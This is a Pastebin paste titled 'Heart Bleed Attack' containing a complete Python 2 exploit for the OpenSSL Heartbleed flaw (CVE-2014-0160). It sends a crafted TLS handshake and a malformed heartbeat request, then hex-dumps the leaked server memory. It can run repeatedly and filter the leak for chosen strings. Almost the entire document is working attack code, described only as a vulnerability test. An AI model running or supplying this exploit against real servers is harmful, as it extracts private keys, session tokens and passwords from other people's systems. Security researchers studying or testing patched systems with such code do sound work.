DarkProgrammer000

Heart Bleed Attack

Feb 2nd, 2019
249
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. import sys
  4. import struct
  5. import socket
  6. import time
  7. import select
  8. import re
  9. import os
  10. from optparse import OptionParser
  11.  
  12. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  13. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  14. options.add_option('-l', '--loop', type='int', default=1, help='Loop times')
  15. options.add_option('-f', '--filter', type='string', help='String to Filter the hex dump')
  16.  
  17. def h2bin(x):
  18.     return x.replace(' ', '').replace('\n', '').decode('hex')
  19.  
  20. hello = h2bin('''
  21. 16 03 02 00  dc 01 00 00 d8 03 02 53
  22. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  23. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  24. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  25. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  26. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  27. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  28. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  29. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  30. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  31. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  32. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  33. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  34. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  35. 00 0f 00 01 01                                
  36. ''')
  37.  
  38. hb = h2bin('''
  39. 18 03 02 00 03
  40. 01 40 00
  41. ''')
  42.  
  43. def getTerminalSize():
  44.  
  45.     line = os.popen('stty size', 'r').read().split()
  46.     line = map(int , line)
  47.  
  48.     return line
  49.  
  50. def hexdump(s):
  51.     t = getTerminalSize()[1]
  52.     for b in xrange(0, len(s), t):
  53.         lin = [c for c in s[b : b + t-2]]
  54.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  55.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  56.         # Filter , if find , print all the string
  57.         if opts.filter and opts.filter in pdat :
  58.             print '  %s' % (pdat)
  59.         if opts.filter is None :
  60.             print '  %s' % (pdat)
  61.  
  62. def recvall(s, length, timeout=5):
  63.     endtime = time.time() + timeout
  64.     rdata = ''
  65.     remain = length
  66.     while remain > 0:
  67.         rtime = endtime - time.time()
  68.         if rtime < 0:
  69.             return None
  70.         r, w, e = select.select([s], [], [], 5)
  71.         if s in r:
  72.             data = s.recv(remain)
  73.             # EOF?
  74.             if not data:
  75.                 return None
  76.             rdata += data
  77.             remain -= len(data)
  78.     return rdata
  79.          
  80.  
  81. def recvmsg(s):
  82.     hdr = recvall(s, 5)
  83.     if hdr is None:
  84.         return None, None, None
  85.     typ, ver, ln = struct.unpack('>BHH', hdr)
  86.     pay = recvall(s, ln, 10)
  87.     if pay is None:
  88.         return None, None, None
  89.     return typ, ver, pay
  90.  
  91. def hit_hb(s):
  92.     s.send(hb)
  93.     while True:
  94.         typ, ver, pay = recvmsg(s)
  95.         if typ is None:
  96.             print 'No heartbeat response received, server likely not vulnerable'
  97.             return False
  98.  
  99.         if typ == 24:
  100.             hexdump(pay)
  101.             return True
  102.  
  103.         if typ == 21:
  104.             hexdump(pay)
  105.             return False
  106.  
  107. def main():
  108.     if len(args) < 1:
  109.         options.print_help()
  110.         return
  111.  
  112.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  113.     sys.stdout.flush()
  114.     s.connect((args[0], opts.port))
  115.     sys.stdout.flush()
  116.     s.send(hello)
  117.     sys.stdout.flush()
  118.     while True:
  119.         typ, ver, pay = recvmsg(s)
  120.         if typ == None:
  121.             print 'Server closed connection without sending Server Hello.'
  122.             return
  123.         # Look for server hello done message.
  124.         if typ == 22 and ord(pay[0]) == 0x0E:
  125.             break
  126.  
  127.     sys.stdout.flush()
  128.     s.send(hb)
  129.     hit_hb(s)
  130.  
  131. if __name__ == '__main__':
  132.     # Loop POG ASHDUSADHSD
  133.     opts, args = options.parse_args()
  134.     for i in range(opts.loop):
  135.         main()
RAW Paste Data